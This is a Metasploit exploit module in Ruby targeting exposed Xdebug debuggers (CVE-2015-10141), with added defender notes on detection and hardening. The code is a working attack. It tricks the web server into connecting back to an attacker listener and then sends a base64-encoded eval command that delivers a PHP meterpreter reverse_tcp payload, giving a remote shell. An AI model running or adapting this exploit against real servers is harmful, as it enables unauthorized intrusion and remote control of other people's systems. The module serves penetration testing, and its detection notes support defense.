Path: blob/master/modules/exploits/unix/http/xdebug_unauth_exec.rb
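##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Metasploit module for the Xdebug remote-debugging exposure tracked as
# CVE-2015-10141.
#
# Defender notes (derived from what this file sends and listens for):
# * The probe request carries an `XDEBUG_SESSION_START` query parameter; the
#   trigger request carries an `XDEBUG_SESSION` cookie plus an
#   `X-Forwarded-For` header. Both use a random 10-character alphanumeric
#   session value, so match on the parameter/cookie name, not the value.
# * The web server then opens an outbound TCP connection to the debugger
#   port (SRVPORT, default 9000). Egress filtering from web servers blocks
#   this step, and such a connection is a useful detection signal.
# * Root cause is a debugger reachable by unauthenticated clients. Keep
#   Xdebug out of production builds, or leave `xdebug.remote_enable` and
#   `xdebug.remote_connect_back` disabled.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient
  include Rex::Proto::Http

  # Registers module metadata and the user-settable options.
  #
  # @param info [Hash] metadata overrides passed through to update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'xdebug Unauthenticated OS Command Execution',
        'Description' => %q{
          Module exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below.
          This allows the attacker to execute arbitrary php code as the context of the web user.
        },
        'DisclosureDate' => '2017-09-17',
        'Author' => [
          'Ricter Zheng', # Discovery https://twitter.com/RicterZ
          'Shaksham Jaiswal', # MinatoTW
          'Mumbai' # Austin Hudson
        ],
        'References' => [
          ['CVE', '2015-10141'],
          ['URL', 'https://redshark1802.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers/'],
          ['URL', 'http://web.archive.org/web/20231226215418/https://paper.seebug.org/397/']
        ],
        'License' => MSF_LICENSE,
        'Platform' => 'php',
        'Arch' => [ARCH_PHP],
        'DefaultTarget' => 0,
        'Stance' => Msf::Exploit::Stance::Aggressive,
        'DefaultOptions' => {
          'PAYLOAD' => 'php/meterpreter/reverse_tcp'
        },
        'Payload' => {
          'DisableNops' => true
        },
        'Targets' => [[ 'Automatic', {} ]],
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options([
      OptString.new('PATH', [ true, "Path to target webapp", "/index.php"]),
      OptAddress.new('SRVHOST', [ true, "Callback host for accepting connections", "0.0.0.0"]),
      OptInt.new('SRVPORT', [true, "Port to listen for the debugger", 9000]),
      Opt::RPORT(80),
    ])
  end

  # Probes PATH with an XDEBUG_SESSION_START parameter and looks for an
  # Xdebug marker anywhere in the response headers.
  #
  # The header match only shows that Xdebug reacted to the session
  # parameter, so the strongest positive result is Detected.
  #
  # @return [CheckCode::Detected] response headers mention XDEBUG
  # @return [CheckCode::Safe] a response arrived without the marker
  # @return [CheckCode::Unknown] no response or a connection error
  def check
    res = send_request_cgi({
      'uri' => datastore["PATH"],
      'method' => 'GET',
      'vars_get' => {
        'XDEBUG_SESSION_START' => rand_text_alphanumeric(10)
      }
    })
    vprint_status "Request sent\n#{res}"

    # A nil response is a timeout. The original code reported it as Safe,
    # which gave a false all-clear for hosts that were never assessed.
    return CheckCode::Unknown unless res

    if res.headers.to_s =~ /XDEBUG/i
      vprint_good("Looks like remote server has xdebug enabled\n")
      return CheckCode::Detected
    end

    CheckCode::Safe
  rescue Rex::ConnectionError
    CheckCode::Unknown
  end

  # Starts a one-shot TCP listener on SRVHOST:SRVPORT, then sends the HTTP
  # request that asks the target to start a debug session. The listener
  # accepts a single inbound connection, reads the greeting, writes one
  # debugger `eval` command holding the encoded payload, and shuts down.
  def exploit
    payl = Rex::Text.encode_base64("#{payload.encoded}")
    cmd1 = "eval -i 1 -- " + Rex::Text.encode_base64("eval(base64_decode(\"#{payl}\"));") + "\x00"

    Thread.new do
      server = nil
      client = nil
      begin
        server = Rex::Socket::TcpServer.create(
          'LocalPort' => datastore['SRVPORT'],
          'LocalHost' => datastore['SRVHOST'],
          'Context' => {
            'Msf' => framework,
            'MsfExploit' => self
          }
        )

        client = server.accept
        print_status("Waiting for client response.")
        data = client.recv(1024)
        print_status("Receiving response")
        vprint_line(data)
        print_status("Shell might take upto a minute to respond.Please be patient.")
        print_status("Sending payload of size #{cmd1.length} bytes")
        client.write(cmd1)
      ensure
        # The original closed the sockets only on the success path, so any
        # exception left SRVPORT bound until the process exited. Its ensure
        # called `webserver.exit` instead, which neither released the sockets
        # nor was guaranteed to see the thread variable assigned. Closing
        # here covers every path, and the thread ends when the block returns.
        begin
          client.close if client
        ensure
          server.close if server
        end
      end
    end

    # NOTE(review): the X-Forwarded-For value is presumably the address that
    # Xdebug's connect-back mode dials; confirm against the Xdebug docs.
    send_request_cgi({
      'uri' => datastore['PATH'],
      'method' => 'GET',
      'headers' => {
        'X-Forwarded-For' => "#{lhost}",
        'Cookie' => 'XDEBUG_SESSION=' + rand_text_alphanumeric(10)
      }
    })
  end
end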